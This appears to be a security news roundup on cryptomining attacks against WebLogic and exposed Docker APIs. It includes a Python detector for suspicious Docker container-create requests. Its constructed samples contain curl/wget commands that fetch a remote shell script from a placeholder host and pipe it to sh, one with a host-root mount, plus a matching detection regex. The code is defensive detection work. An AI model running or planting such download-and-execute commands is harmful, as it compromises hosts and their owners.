Threat actors have been targeting Oracle WebLogic Servers and Docker APIs to facilitate cryptomining malware deployment, according to The Hacker News.
Kinsing malware operators have been exploiting both new and old WebLogic flaws to disable security features built into the operating system, a report from Trend Micro revealed. Vulnerable WebLogic servers have been compromised through attacks leveraging a remote code execution bug, tracked as CVE-2020-14882, which was previously exploited to deploy a Monero miner and the Tsunami backdoor.
"The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems. This can range from malware execution [...] to theft of critical data, and even complete control of a compromised machine," said Trend Micro.
Meanwhile, a separate report from Aqua Security shed light on three new attacks from the TeamTNT cryptojacking group, which ended operations last November.
"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server," said Aqua Security researcher Assaf Morag, who added that the new attacks sought to break SECP256K1 encryption to compromise cryptocurrency wallets.
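As an added illustration of how a defender might spot the container-deployment pattern Aqua Security describes (a vanilla image started with a command that fetches and runs a remote shell script against an exposed Docker daemon), the following Python triages constructed Docker Engine API container-create request bodies. It is example code written for this page, not Aqua Security's or Trend Micro's tooling; the request samples, hostnames and the image list are assumptions.

```python
import json
import re
from typing import Dict, List

# Constructed samples of "POST /containers/create" request bodies, in the shape a
# reverse proxy or audit hook in front of a Docker daemon might record them.
SAMPLE_REQUESTS = [
    '{"Image":"alpine","Cmd":["sh","-c","wget -q -O - http://example.invalid/k.sh | sh"],'
    '"HostConfig":{"Binds":["/:/host"]}}',
    '{"Image":"nginx:1.25","Cmd":null,"HostConfig":{"Binds":[]}}',
    '{"Image":"busybox","Cmd":["sh","-c","curl -s http://example.invalid/x.sh | sh"],'
    '"HostConfig":{}}',
    '{"Image":"alpine","Cmd":["sleep","3600"],"HostConfig":{}}',
]

# Assumed list of "vanilla" base images that rarely run workloads on their own.
VANILLA_IMAGES = {"alpine", "busybox", "ubuntu", "debian", "centos"}
# A curl/wget invocation whose fetched .sh content is piped straight into a shell.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;]*\.sh\b[^|;]*\|\s*(sh|bash)\b")


def assess_create_request(body: str) -> Dict[str, object]:
    """Return the indicators found in one container-create request body."""
    req = json.loads(body)
    image = req.get("Image", "").split("@")[0].split(":")[0]
    cmd = " ".join(req.get("Cmd") or [])
    binds = (req.get("HostConfig") or {}).get("Binds") or []
    findings: List[str] = []
    if image in VANILLA_IMAGES:
        findings.append("vanilla base image")
    if DOWNLOAD_EXEC.search(cmd):
        findings.append("downloads and executes remote shell script")
    if any(b.startswith("/:") for b in binds):
        findings.append("mounts host root filesystem")
    # A vanilla image alone is benign; remote script execution or a host-root
    # mount is what warrants an alert.
    suspicious = any(f != "vanilla base image" for f in findings)
    return {"image": image, "findings": findings, "suspicious": suspicious}


def triage(bodies: List[str]) -> List[int]:
    """Indices of the request bodies that should be alerted on."""
    return [i for i, b in enumerate(bodies) if assess_create_request(b)["suspicious"]]


if __name__ == "__main__":
    for i in triage(SAMPLE_REQUESTS):
        print(i, assess_create_request(SAMPLE_REQUESTS[i]))
```

The same check applies to live data by feeding it `docker inspect` output or proxy logs instead of the constructed samples; the underlying fix remains not exposing the daemon socket without authentication.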
The Hacker News reports that threat actors have been using cracked software to distribute the new NullMixer malware dropper, which could simultaneously deploy various trojans to enable credential, address, cryptocurrency, credit card data, and Facebook and Amazon cookie exfiltration.